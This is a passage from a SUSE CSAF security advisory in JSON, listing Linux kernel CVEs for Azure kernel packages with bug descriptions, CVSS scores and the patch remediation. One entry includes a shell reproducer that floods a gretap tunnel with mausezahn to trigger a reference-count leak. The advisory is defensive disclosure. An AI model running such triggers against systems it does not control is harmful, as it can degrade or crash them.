"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68215",
"url": "https://www.suse.com/security/cve/CVE-2025-68215"
},
{
"category": "external",
"summary": "SUSE Bug 1255226 for CVE-2025-68215",
"url": "https://bugzilla.suse.com/1255226"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68215"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n - No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing\n\nThe Extended Supported Rates (ESR) IE handling in OnBeacon accessed\n*(p + 1 + ielen) and *(p + 2 + ielen) without verifying that these\noffsets lie within the received frame buffer. A malformed beacon with\nan ESR IE positioned at the end of the buffer could cause an\nout-of-bounds read, potentially triggering a kernel panic.\n\nAdd a boundary check to ensure that the ESR IE body and the subsequent\nbytes are within the limits of the frame before attempting to access\nthem.\n\nThis prevents OOB reads caused by malformed beacon frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68254",
"url": "https://www.suse.com/security/cve/CVE-2025-68254"
},
{
"category": "external",
"summary": "SUSE Bug 1255140 for CVE-2025-68254",
"url": "https://bugzilla.suse.com/1255140"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68254"
},
{
"cve": "CVE-2025-68256",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68256"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser\n\nThe Information Element (IE) parser rtw_get_ie() trusted the length\nbyte of each IE without validating that the IE body (len bytes after\nthe 2-byte header) fits inside the remaining frame buffer. A malformed\nframe can advertise an IE length larger than the available data, causing\nthe parser to increment its pointer beyond the buffer end. This results\nin out-of-bounds reads or, depending on the pattern, an infinite loop.\n\nFix by validating that (offset + 2 + len) does not exceed the limit\nbefore accepting the IE or advancing to the next element.\n\nThis prevents OOB reads and ensures the parser terminates safely on\nmalformed frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68256",
"url": "https://www.suse.com/security/cve/CVE-2025-68256"
},
{
"category": "external",
"summary": "SUSE Bug 1255138 for CVE-2025-68256",
"url": "https://bugzilla.suse.com/1255138"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68256"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
